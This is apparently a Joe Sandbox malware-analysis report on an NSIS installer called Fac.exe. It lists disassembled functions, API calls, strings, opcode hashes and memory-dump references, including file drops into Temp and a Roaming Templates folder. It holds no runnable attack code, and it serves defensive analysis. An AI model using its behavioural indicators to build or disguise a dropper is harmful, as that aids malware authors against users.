Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Fac.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Fac.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-1862517388
Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000), ref: 004063FA
SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000), ref: 00406436
SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000), ref: 004064CD

Strings

Call, xrefs: 004062D0, 004063AB, 004063B2, 004063B6, 004063D0, 004063D1, 004063E6, 004063F9, 00406415, 00406440, 00406474, 0040647A, 00406496, 004064A9, 004064C6, 004064CC, 004064D8, 0040650B
Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll, xrefs: 004062CB
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2386560063
Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,?,00000031), ref: 004017D5

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsr797A.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsr797A.tmp$C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call
API String ID: 1941528284-1721639326
Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll), ref: 00405359
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll, xrefs: 0040530D, 0040531D, 00405323, 00405346, 00405352

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll
API String ID: 2531174081-1589482430
Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
wsprintfW.USER32 ref: 00406640
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Strings

\, xrefs: 00406616
%s%S.dll, xrefs: 0040663A
UXTHEME, xrefs: 004065F7

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403177
GetTickCount.KERNEL32 ref: 004031F8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403225
wsprintfW.USER32 ref: 00403238

Strings

... %d%%, xrefs: 00403232

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
GetLastError.KERNEL32 ref: 00405812
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
GetLastError.KERNEL32 ref: 00405831

Strings

C:\Users\user\Desktop, xrefs: 004057BB

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DC7
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Fac.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77293420,004035A3), ref: 00405DE2

Strings

"C:\Users\user\Desktop\Fac.exe", xrefs: 00405DA9
nsa, xrefs: 00405DB6
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Fac.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1597786485
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

Function 7017177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 70171B63: GlobalFree.KERNEL32(?), ref: 70171DB6
Part of subcall function 70171B63: GlobalFree.KERNEL32(?), ref: 70171DBB
Part of subcall function 70171B63: GlobalFree.KERNEL32(?), ref: 70171DC0

GlobalFree.KERNEL32(00000000), ref: 70171829
FreeLibrary.KERNEL32(?), ref: 701718AF
GlobalFree.KERNEL32(00000000), ref: 701718D4

Part of subcall function 70172356: GlobalAlloc.KERNEL32(00000040,?), ref: 70172387

Part of subcall function 70172728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701717FA,00000000), ref: 701727F8

Part of subcall function 701715C6: lstrcpyW.KERNEL32(?,70174020,00000000,701715C3,?,00000000,70171753,00000000), ref: 701715DC

Strings

, xrefs: 701718B5

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: f388447a6beb82575e8c8d7f8b422a52034183b6eef9dd6b1f34892b12d6f5cd
Instruction ID: 9bd1c5237a4ca91cbdad775b1f4d1f63a8619fb54510e00b5bfdd90ab797e369
Opcode Fuzzy Hash: f388447a6beb82575e8c8d7f8b422a52034183b6eef9dd6b1f34892b12d6f5cd
Instruction Fuzzy Hash: 9E41D2724002049ACB158F38DC84BCE37BCBB15310F12F579F9479E686DBB89885CB62

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,77293420,004059B6,?,C:\Users\user\AppData\Local\Temp\,77293420,00000000), ref: 00405C12
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab
API String ID: 1892508949-1793031794
Opcode ID: f016b00615f9d65ee3458270e5d489e8c8114c99f0c06642e4f3a09aec43fc39
Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
Opcode Fuzzy Hash: f016b00615f9d65ee3458270e5d489e8c8114c99f0c06642e4f3a09aec43fc39
Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45

Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
